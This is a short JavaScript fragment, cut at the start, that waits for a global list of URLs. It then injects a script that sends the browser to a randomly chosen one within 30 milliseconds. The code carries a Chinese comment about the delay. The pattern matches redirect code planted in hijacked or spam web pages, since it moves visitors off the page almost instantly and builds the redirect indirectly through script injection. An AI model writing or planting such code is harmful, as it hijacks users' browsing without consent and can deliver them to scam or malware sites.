/?dl=$eix4zh$IDR$2");
var rid = "";
var timesleep = "30";
//延迟跳转单位毫秒
function wContent1() {
var script = document.createElement("script");
script.innerHTML = 'var weburl = url[Math.floor(Math.random()*url.length)]+""+rid; setTimeout(function () {window.location = weburl;},timesleep);';
document.body.appendChild(script)
}
function xunhuan1() {
if (typeof url == 'undefined' || url == null) {
setTimeout(function() {
xunhuan1()
}, 50)
} else {
wContent1()
}
}
xunhuan1();